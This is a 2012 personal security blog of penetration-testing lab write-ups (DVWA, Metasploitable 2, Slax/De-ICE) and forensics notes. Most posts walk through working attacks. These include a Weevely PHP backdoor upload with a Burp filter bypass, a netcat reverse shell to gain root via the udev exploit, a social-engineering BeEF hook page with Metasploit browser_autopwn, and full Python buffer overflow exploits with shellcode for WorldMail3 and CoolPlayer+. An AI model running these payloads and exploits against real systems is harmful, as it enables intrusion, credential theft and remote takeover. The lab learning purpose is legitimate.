SECURITY

Wednesday, 14 November 2012

Slax De-ICE v2.100 Solution

Posted by shinigami at 07:46

#Information Gathering

Scaning using Netdiscover :

Scanning with Nmap :

result for information gathering:

root@bt:~# nmap -sS -A 192.168.2.100

Starting Nmap 6.01 ( http://nmap.org ) at 2012-11-12 04:49 EST
Nmap scan report for 192.168.2.100
Host is up (0.0011s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
25/tcp open smtp Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.2.105], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP ". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
|_pop3-capabilities: capa
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: LOGIN-REFERRALS THREAD=ORDEREDSUBJECT UNSELECT SCAN AUTH=LOGINA0001 MAILBOX-REFERRALS BINARY IMAP4REV1 completed THREAD=REFERENCES SASL-IR OK CAPABILITY SORT STARTTLS LITERAL+ IDLE NAMESPACE MULTIAPPEND
443/tcp closed https
MAC Address: 08:00:27:E7:A0:2B (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host: slax.example.net; OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 1.13 ms 192.168.2.100

In address 192.168.2.100:80 I have found some credential information about developer and marketer.

# Service Enumeration

20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357

# Vulnerability Assesment

1.    FTP Login Anonymous allowed
2.    OpenSSH Denial of Service
3.    Directory Listing

# Exploitation

First, I'm interesting with FTP login but I dont't get anything in the ftp.

Second, I have try on openSSH with vulnerable DOS. Try using this exploit and the ssh service temporary down. /pentest/exploits/exploitdb# platforms/multiple/dos/2444.sh

Third, I'm trying to directory listing on http service. this part separated into 3 step :

Create userlisting from available info in their web site.
Create file listing for common user in linux syste,
Combination userlisting and filelisting with dirb, dirb available in backtrack.

root@bt:/pentest/web/dirb# ./dirb http://192.168.2.101/ /root/Slax2.100/credential.txt,/root/Slax2.100/filelist.txt -w -l

Dirb usage:

From the dirb, you can see ~pirrip/.ssh/ listing. Then open it from your browser and download the id_rsa and id_rsa.pub. Two files is ssh key authentication. Now connect to the machine target with ssh.

# ssh -i id_rsa pirrip@192.168.2.100

Well, we have connected into target machine. But we don't know what is the password of pirrip.

Finally I'm using grep to find string with password.

# grep -r "Password" /

For the long time, I got the password of pirrip -> 0l1v3rtw1st

Friday, 9 November 2012

Slax v.110

Posted by shinigami at 02:56

# Information Gathering

In this part, I will IG the target using Nmap with the command :

# nmap -sS -A 192.168.1.110

and return the result ->

# Service Enumeration

FTP (vsftpd)
SSH
CUPS Print
HTTPd

# Vulnerability Assesment

From the Information Gathering and Service Enumeration result, we know that FTP are allowed the user to login anonymously. May be we can get some interesting file inside.

Before, I have trial to get each file on it. But I'm intersting with core file.
Download it and open it, I'm opened it using cat, look scream...
Try to open it with 'strings' command, w00t we got the string of shadow file.
Now separated the shadow string and the other, copy the shadow string and copy it into text editor.

# Exploitation

Now time to crack the shadow, I used John THe Ripper to do this job. And finally, we got it. Enjoy!

Saturday, 3 November 2012

Network Forensic Puzzle #1

Posted by shinigami at 07:39

Yesterday I was learn about Network Forensic, and my case is captured paket using Wireshark. You can download the capture file here.

After download the capture. We can open it wid DD and then capture it.
For short tutor we can use the dumb way. In this case I will pulling data named "recovery.docx" So, we need to know what is the header / magic number of docx files.
If you don't know about magic number, you can browse it on Google with keyword magic number programming. The magic number of docx file is 504B. Ok, you got the key now.

Now I will use tcpflow to split the each packet on the capture file.

# tcpflow -r evidence.pcap

and some split is 192.168.001.158.05190-192.168.001.159-01272. For short tuts, I have select the splited file that contain receipe.docx

The captured file is contains hexa. With DD you can see the hexa of captured file. I used the dumb trick method to pull up the captured file. First I will convert the file into raw.

# xdd -ps 192.168.001.158.05190-192.168.001.159-01272 > raw.txt

Open the raw.txt with text editor like gEdit or Kate. Then search word 504B, at the first time of returned result. Please remove the line/text before 504B, and then save it.

Back to DD, and convert the raw.txt into binary.

#xdd -r -ps raw.txt > receipe.docx

Finally, open the receipe.docx with Word Processor like MS Office or Libre Office.

Memory Forensic

Posted by shinigami at 01:10

Today I was learn about Memory Forensic. My target is windows xp, before I have been dump memory from windows xp using AccessData FTK. After dumping memory, I copied the dump memory into backtrack, and then open it using Volatile.

# ./vol.py -f /path/of/memorydump.mem imageinfo

after run the command above, you will see some information about memory info.

Using volatile you can see proccess,networking, and much more.

The image above will show some feature of Volatile tool.

I think we can dump password for windows machine using volatile. You can use hashdump and havelist.

Images below show me how many connections in my windows machine. We can see that someone with ip address 192.168.56.102 connected to my machine with port 6660 and 4444 in the same PID. May be someone was attack my machine using vulnerability on BigAnt and connect back with opening port 4444.

In this case, we can see history of cmd command typed by user before memory dumped using FTK.

Monday, 29 October 2012

How to get pwnOS IP Address

Posted by shinigami at 17:30

Yesterday, I was learn about pwnOS. The vulnerable operating system for penetration testing lab. Then I trying to run the pwnOS in VMware, after booting and login prompt appear any question in my mind. What is the IP address on pwnOS?

Trying to scan from backtrack machine using nmap, but nothing found. Then I try to open pwnOS using virtual box, and then scaning again using nmap and finally I got it. From the problem before, I indicating that VMware doesn't giving IP address on PWNOS before we login into pwnOS system.
But in virtual box, the IP will be given before we login into pwnOS.

So, the conclusion is :

If we are using VM Ware, we need to login into pwnOS system to get the IP address, but
If we are using VirtualBox, we don't need login to get IP address.

Friday, 26 October 2012

Linux Tools for Digital Forensic

Posted by shinigami at 20:04

Here is common tools are used for digital forensic in Linux,

# DD

The DD tool is used for clone the device like hard-drive. DD will clone the device look like the original device. If the size of device is 500GB so the result of clone is 500GB too.
The command for DD clone :

# dd if=/dev/sda of=/tmp/forensic

if : input file
of: output file

# FDISK

Fdisk commonly used for hard drive partition. In digital forensic, you can use fdisk for craving information in the device.

# fdisk -ul /path/of/clonning/device

# MD5SUM

MD5SUM usually used for getting hash of device or file. With md5sum, you can keep the integrity of your digital evidence.
The command for md5sum :

# md5sum file_or_device

# XDD

XDD used for getting the byte offset. Using XDD is easily to get the offset of file.
The command is :

# xxd clone_images

Introduction of Computer Forensic

Posted by shinigami at 19:52

# What is Computer Forensic ?

Definition of Computer Forensic is a proccess to finding, searching, analysis dam collecting the evidence from computer system with the standard forensic and documentation for legal evidence in the court.

# What is Unallocated Space ?

Unallocated Space usually called as "Free Space", is a logical space on hard drive that the operating system. The space not be used by the operating system before formated, the opposite of Unallocated Space commonly called as Allocated Space. The Allocated space is used by operating system for write the data or file.

# What is Slack Space ?

The Slack Space refers are not fully used by the current allocated file and which may be contain data from a previously deleted file. For detail, please see the images below :

Monday, 22 October 2012

Hacking DVWA and got the ROOT

Posted by shinigami at 16:18

Hello All, today I was learn about DVWA. And I want to hack DVWA until got the root. I'm using fitur upload with high security level. Before I have prepared php backdoor that generated using Weevly.

# Create Backdoor with Weevely

Goto terminal, type :

cd /pentest/web/backdoors/weevely

Create backdoor with this command :

./weevely.py generate secret cobasaja.php

See the picture below for detail,

# Upload the Backdoor and Bypass DVWA protection with DVWA

Upload the backdoor which has been created using Weevly.

You will see that the upload failed, ok we can bypass them using BurpSuite.

Open your Burp Suite, and make sure intercept is on

Open your browser, and set proxy into burp suite. 127.0.0.1:8080

Back to DVWA and re-upload the backdoor. Buprsuite will tamper it.

Edit your filename with add .jpg extension.

Next press forward button.

Horray, the backdoor upload successfully...

Now connect your backdoor with our machine, type this command :

./weevely.py http://192.168.56.102/dvwa/hackable/uploads/cobasaja.php.jpg secret

OK, now your machine connected with backdoor.

# ROOTING

Now, I will search available user on target machine.

cat /etc/passwd

Yuhu we got user named msfadmin

I will crack this user with medusa

medusa -h 192.168.56.101 -u msfadmin -P /pentest/passwords/wordlists/darkc0de.lst -e ns -M ssh

* -h : hostname

-u username

-P path of wordlist

-e options password, ns for blank password and username same as password

-M module

Haha, I got password for username msfadmin. "msfadmin" as password for msfadmin

What happened if brute force failed? Huh, we must try to do local exploit. I will use udev exploit for linux kernel. You can download the kernel exploit here

After download the kernel, we need to compile it.

gcc 8572.c -o udev

Now, create script to make target machine connect to our machine with netcat using root access.

echo '#!/bin/bash' > /tmp/run

echo '/bin/netcat -e /bin/bash 192.168.56.102 4444' >> /tmp/run

* please note that 192.168.56.102 is our ip (attacker)

Back to our machine, make our system listen to port 4444

nc -lvp 4444

Check the PID of udev using following command,

cat /proc/net/netlink

You see that the PID is 2441, We will need this PID

Now Back to our exploit, run the compiled exploit followed with the PID

./udev 2441

Goto our netcat, and type id and whoami, you will see that you are got the root

Friday, 19 October 2012

Social Engineering + BeEF + Metasploit, finally pwned

Posted by shinigami at 11:58

Heiyo, today we will learn about pwned victim from browser. My scenario is :

Make user visit our page, with SocialEngineering
Setup BeEF
Setup Metasploit browser_autopwn
Play and Pwned

Ok, lets doing

#1. Social Engineering

Social Engineering with the best plan will result the best thing. I have plan to make link to the target. Of course the link must create interest. In this case I will create page with contain Ayana images (JKT48 personel). She is a beauty girl, so the target victim is Male of course. Hehe
Prepare the Ayana images, named cantik.jpg
Lets create the page with code below :

<html>
<head>
<title>Ayana.jpg</title>
<script src="http://192.168.56.101:3000/hook.js"></script> <!-- file JS from BeEF -->
</head>
<body>
<img src="cantik.jpg" />
</body>
</html>

Save as this file with named index.html
Place the file into this directory /var/www/ayana.jpg/
* 192.168.56.101 is our ip address (attacker machine)
* ayana.jpg is directory, its to make the uri look a like addressed to images file.

Run your apache service, to make it work.

#2. Setup BeEF

Run the BeEF from Backtrack Tools->Exploitation->Social Engineering->BeEF
Open the panel of BeEF using your browser here http://127.0.0.1:3000/ui/panel
Now, give the target address http://192.168.56.101/ayana.jpg
You can use your favorite technique to gives the link, may be you can say that "Hei bro, look the beautiful girl here http://192.168.56.101/ayana.jpg"
Back into BeEF panel to monitor your target.

Here, my target running Windows XP SP3 with IE 8 installed.

#3. Setup Metasploit browser_autopwn

Before I have read about browser_autopwn on metasploit (here), so I have idea to do that on my scenario.
Open msfconsole, then type :
msf > use auxiliary/server/browser_autopwn

Show the options for this auxiliary, type :
msf auxiliary(browser_autopwn) > show options

set the LHOST with our IP address (attacker machine), type:
msf auxiliary(browser_autopwn) > set LHOST 192.168.56.101

Run the auxiliary, type :
msf auxiliary(browser_autopwn) > run

Wait until you see that

At this point, we need to notes the exploit address. http://192.168.56.101/paVleLsD
* 192.168.56.101 is our ip (attacker machine)

#4. Lets play the game

Ok, the resume of scenarios is :
- Give the target some of url with contain images. http://192.168.56.101/ayana.jpg
When vitctim access this page, he/she will see it :

- After that, back into BeEF panel and see what happens on that

The attacker was connected to BeEF with IE 8. Now redirect the victim into metasploit. See the image below for detail.

As we can see that the metasploit was successfully gaining access into windows system.

Now, check the session on metasploit with command :

sessions -l

Connect to windows using meterpreter. Type :

sessions -i 2

* 2 is id of sessions on metasploit

Wednesday, 17 October 2012

Metasploitable 2 has been pWned - Part 2

Posted by shinigami at 01:00

After posting about pentest on Metasploitable v.2 (here), I will continue to attack again on machine target using result from Nmap scanning before. You can see the available service here.
Ok, in this post the target service is Unreal IRCd.

Run the Metasploit
Search exploit for Unreal IRCd using metasploit

# msf > search unreal irc

It will returned :

exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12 00:00:00 UTC  excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution

Now, use the exploit above

# msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

See what the available configuration for this exploit

# msf exploit(unreal_ircd_3281_backdoor) > show options
It will returned,

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  6667             yes       The target port


Exploit target:

Id  Name
--  ----
0   Automatic Target

Set the RHOST,

# msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.56.103

Show the available payloads,

# msf exploit(unreal_ircd_3281_backdoor) > show payloads
returned:

ompatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_perl                        normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                   normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                        normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                   normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                          normal  Unix Command Shell, Double reverse TCP (telnet)
   cmd/unix/reverse_perl                     normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_ruby                     normal  Unix Command Shell, Reverse TCP (via Ruby)

I will use cmd/unix/reverse for telnet connection,

# msf exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse

See the configuration for the payload,

# msf exploit(unreal_ircd_3281_backdoor) > show payloads
returned,

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.56.103   yes       The target address
   RPORT  6667             yes       The target port


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Set the LHOST with our IP Address

# msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.56.101
Now, launch the exploit

# msf exploit(unreal_ircd_3281_backdoor) > exploit
OK, wait for a minute and you will bringing into linux shell... type uname -a for test

# uname -a

Metasploitable 2 has been PWNED with Metasploit

Posted by shinigami at 00:09

Hi All, today I want to share about how to pwned Metasploitable v2.
You can download metasploitable v2 here http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
After installing Metasploitable 2 on Virtual machine, We will start to the step of pentest.

Scan the running service on target machine
Here, I'm using Nmap to do this job

# nmap -sV -A 192.168.56.103
I got this information about the services

Starting Nmap 6.01 ( http://nmap.org ) at 2012-10-17 17:18 EDT
Nmap scan report for 192.168.56.103
Host is up (0.00097s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell?
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open ingreslock?
2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Ok, to many service. I will try VSFTPd 2.3.4
Run your Metasploit, and search the exploit for VSFTPd 2.3.4
Use the search command on Metasploit

# msf> search vsftpd
It will return

exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command Execution
Use the exploit above,

# msf> use exploit/unix/ftp/vsftpd_234_backdoor
Setting the exploit,

# msf exploit(vsftpd_234_backdoor) > show options
Set the RHOST with the IP Target

# msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.56.103
Show the available PAYLOAD,

# msf exploit(vsftpd_234_backdoor) > show payloads
Select the Payload,

# msf exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact
Run the Exploit command,

# msf exploit(vsftpd_234_backdoor) > exploit
Wait and you will bring into linux shell. Type uname -a and you will see the kernel of metasploitalbe 2.

Read my next post, Metasploitable 2 pwned with Metasploit - Part 2

Friday, 12 October 2012

Why POP POP RETN ?

Posted by shinigami at 06:52

When learning about bypass SafeSEH protection, often meet with command POP POP RETN.
whether is POP POP RETN ?
based my knowledge, this commands are the popular method to bypass safeseh. Commonly, memory is contain memory 32bit or 4byte virtual file. POP command first will remove the value of the top from virtual file into other memory register, and then the second POP command will remove the value of the second virtual file into other memory, and finally the RETN command will be the first stack. So the system will be execute command based on memory address on RETN.

May be you will more understand about POP POP RETN after see the image above

Qualcom WorldMail3 Buffer Overflow

Posted by shinigami at 06:41

Today I want to learn about buffer overflow on Qualcom Worldmail3.
First, I make fuzzer using vulnerable character and command :

a001 LIST }

My fuzzer look like this :

#!/usr/bin/python
import socket
buffer = "\x41" * 800
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.101",143))
s.recv(1024)
s.send(exploit)
s.close()

Open Ollydbg and attach IMAP4.exe
Application crash? If yes, now goto View->SEH Cain, and press Shift+F9. EIP has been overwrite.
Now time for getting offset, in this case I have found that the offset is 774. So, modify the fuzzer again. Btw you need to restart your Windows.

#!/usr/bin/python
import socket
buffer = "\x41" * 774
buffer += "\xcc" * 4
buffer += "\x41" * (800-len(buffer))
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.101",143))
s.recv(1024)
s.send(exploit)
s.close()

Run the Ollydbg and attach IMAP4, then re-run the fuzzer.
What you see? EIP was overwrite with CCCCCC, it's mean that the offset is accurate.
Check the module which not protected by safeseh, in this case the mailcmn.dll is not protected.
Now search the POP POP RETN opcode, please note that the address is not contain 00,0a and 0d.
Now edit the fuzzer for setup the payload :

#!/usr/bin/python
import socket
import os
import time
shellcode = "w00tw00t"
shellcode += ("\xb8\x1d\x77\xf6\x2c\xda\xca\x31\xc9\xb1\x51\xd9\x74\x24\xf4\x5a"
"\x31\x42\x12\x03\x42\x12\x83\xf7\x8b\x14\xd9\xfb\x1e\x32\x6f\xeb"
"\x26\x3b\x8f\x14\xb8\x4f\x1c\xce\x1d\xdb\x98\x32\xd5\xa7\x27\x32"
"\xe8\xb8\xa3\x8d\xf2\xcd\xeb\x31\x02\x39\x5a\xba\x30\x36\x5c\x52"
"\x09\x88\xc6\x06\xee\xc8\x8d\x51\x2e\x02\x60\x5c\x72\x78\x8f\x65"
"\x26\x5b\x58\xec\x23\x28\xc7\x2a\xad\xc4\x9e\xb9\xa1\x51\xd4\xe2"
"\xa5\x64\x01\x1f\xfa\xed\x5c\x73\x26\xee\x3f\x48\x17\xd5\xa4\xc5"
"\x1b\xd9\xaf\x99\x97\x92\xc0\x05\x05\x2f\x60\x3d\x0b\x58\xef\x73"
"\xbd\x74\xbf\x74\x17\xe2\x13\xec\xf0\xd8\xa1\x98\x77\x6c\xf4\x07"
"\x2c\x6d\x28\xdf\x07\x7c\x35\x24\xc8\x80\x10\x05\x61\x9b\xfb\x38"
"\x9c\x6c\x06\x6f\x35\x6f\xf9\x5f\xa1\xb6\x0c\xaa\x9f\x1e\xf0\x82"
"\xb3\xf3\x5d\x79\x67\xb7\x32\x3e\xd4\xc8\x65\xa6\xb2\x27\xda\x40"
"\x10\xc1\x03\x19\xfe\x75\xd9\x51\x38\x22\x21\x47\xac\xdd\x8c\x32"
"\xce\x0e\x46\x18\x9d\x81\x7e\x37\x21\x0b\xd3\xe2\x22\x64\xbc\xe9"
"\x94\x03\x74\xa6\xd9\xda\xd7\x1c\x72\xb6\x28\x4c\xe9\x50\x30\x15"
"\xc8\xd8\xe9\x1a\x02\x4f\xe9\x34\xcd\x1a\x71\xd2\x7a\xb8\x14\x93"
"\x9e\x54\xb7\xfa\x49\x65\xbe\x1b\xe3\x31\x48\x01\xc5\x79\xb9\x6f"
"\xd8\x38\x13\x91\x67\x91\xf8\xe0\x12\xd1\x55\x51\x49\x49\xd8\x5b"
"\x3d\x9c\xe3\xd6\x06\x5e\xcd\x43\xd0\xf2\xa3\x22\x8f\x98\x42\x95"
"\x7e\x08\x14\xea\x51\xda\x3b\xcd\x57\xd5\x17\x12\x81\x83\x68\x13"
"\x19\xab\x47\x60\x31\xaf\xeb\xb2\xda\xb0\x3a\x68\xdc\x9f\xab\xf2"
"\xfa\xc2\x5f\x59\x04\xd4\x5f\x8d") #bad char 00,0a,0d,
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
buffer = "\x90" * (738-len(shellcode))
buffer += shellcode
buffer += "\x90" * 32
buffer += "\xeb\x06\x90\x90"
buffer += "\x4e\x3b\x01\x10"
buffer += egghunter
buffer += "\x90" * (800-len(buffer))
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.101",143))
s.recv(1024)
s.send(exploit)
s.close()
print "Waiting for 10 sec ..."
time.sleep(10) #waiting until egghunter proses done, please be patient
print "Try to connect ..."
os.system("telnet 192.168.56.101 4444")

OK, run again the fuzzer. and I got this

Monday, 8 October 2012

Buffer Overflow CoolPlayer+ Portable 2.19.2

Posted by shinigami at 12:54

Today I learn buffer overflow CoolPlayer+ Portable 2.19.2. This is a Audio Player for windows. I need to prepare some tools for exploitation.

Windows XP SP 3 English
Ollydbg
Metasploit
Geany text editor

First, I will create fuzzer. Step by step the fuzzer from 100 until 1000. When fuzzer size 100 byte, the application crash but, the stack space for payload is to small. So I trying to place 1000 fuzzer, and the result is the application crash too and the stack space is enough.

#!C:\Python27\python.exe

########################################
## Information Security Shinobi Camp #
## http://is2c-dojo.com #
## http://scx020c07c.blogspot.com #
########################################

# How to use
# fuzzer.py playme.m3u "\x41" 1000

import sys
filename = sys.argv[1]
my_args = sys.argv[2]
long_args= int(sys.argv[3])

sploit = my_args * long_args

fopen = open(filename,'w')
fopen.write(sploit)

Run the fuzzer, open the playlist using Cool Player and look at the EIP. The EIP was overwriten.
After making EIP overwrite, I need to know where the EIP overwriten exactly.
Use metasploit pattern_create to check it,

./pattern_create.rb 1000

edit the fuzzer

#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp #
## http://is2c-dojo.com #
## http://scx020c07c.blogspot.com #
########################################
filename = "playme.m3u"
junk = ".....pattern_create......"
sploit = junk
fopen = open(filename,'w')
fopen.write(sploit)

Now, re-run the fuzzer. Reopen the ollydbg and attach the Coolplayer. Load the playme.m3u again.
Look at the EIP, copy the value and check using pattern_offset of metasploit tools

./pattern_offset.rb 30684139

and return value 209. Now back into fuzzer and edit look like this :

#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp #
## http://is2c-dojo.com #
## http://scx020c07c.blogspot.com #
########################################
filename = "playme.m3u"
junk = "\x90" * 209
junk += "\xEF\xBE\xAD\xDE"
junk += "\x41" * (1000-len(junk))
sploit = junk
fopen = open(filename,'w')
fopen.write(sploit)

Run the fuzzer, restart Olly and Coolplayer. Then load playme.m3u again. Make sure that the EIP was overwritten with DEADBEEF.
Then we need module that having opcode JMP ESP.
Click View->Executable Module, double click SHELL32.dll. Search the JMP ESP, Click right->Search For->Command, insert JMP ESP. Please note the address of JMP ESP.

Back into CPU right block, Click in the ESP and Right click Follow in Dump.

We can see that the space for payload is enough for Execute Command Payload. So I will use it.
Generate payload using metasploit and the bad characters is 00,0a,0d
Edit the fuzzer again :

#!C:\Python27\python.exe
junk = "\x90" * 209
junk += "\xD7\x30\x9D\x7C" # JMP ESP
junk += "\x90" * 16
junk += ("\xba\x90\x6e\xa9\x03\xdb\xc1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x32\x83\xc3\x04\x31\x53\x0e\x03\xc3\x60\x4b\xf6\x1f\x94\x02"
"\xf9\xdf\x65\x75\x73\x3a\x54\xa7\xe7\x4f\xc5\x77\x63\x1d\xe6"
"\xfc\x21\xb5\x7d\x70\xee\xba\x36\x3f\xc8\xf5\xc7\xf1\xd4\x59"
"\x0b\x93\xa8\xa3\x58\x73\x90\x6c\xad\x72\xd5\x90\x5e\x26\x8e"
"\xdf\xcd\xd7\xbb\x9d\xcd\xd6\x6b\xaa\x6e\xa1\x0e\x6c\x1a\x1b"
"\x10\xbc\xb3\x10\x5a\x24\xbf\x7f\x7b\x55\x6c\x9c\x47\x1c\x19"
"\x57\x33\x9f\xcb\xa9\xbc\xae\x33\x65\x83\x1f\xbe\x77\xc3\xa7"
"\x21\x02\x3f\xd4\xdc\x15\x84\xa7\x3a\x93\x19\x0f\xc8\x03\xfa"
"\xae\x1d\xd5\x89\xbc\xea\x91\xd6\xa0\xed\x76\x6d\xdc\x66\x79"
"\xa2\x55\x3c\x5e\x66\x3e\xe6\xff\x3f\x9a\x49\xff\x20\x42\x35"
"\xa5\x2b\x60\x22\xdf\x71\xee\xb5\x6d\x0c\x57\xb5\x6d\x0f\xf7"
"\xde\x5c\x84\x98\x99\x60\x4f\xdd\x56\x2b\xd2\x77\xff\xf2\x86"
"\xca\x62\x05\x7d\x08\x9b\x86\x74\xf0\x58\x96\xfc\xf5\x25\x10"
"\xec\x87\x36\xf5\x12\x34\x36\xdc\x70\xdb\xa4\xbc\x76")

sploit = junk

fopen = open("playme.m3u",'w')
fopen.write(sploit)
fopen.close()

Rerun the fuzzer, open coolplayer and load the playme.m3u again. Look the Coolplayer was crash and calculator appear.

Pages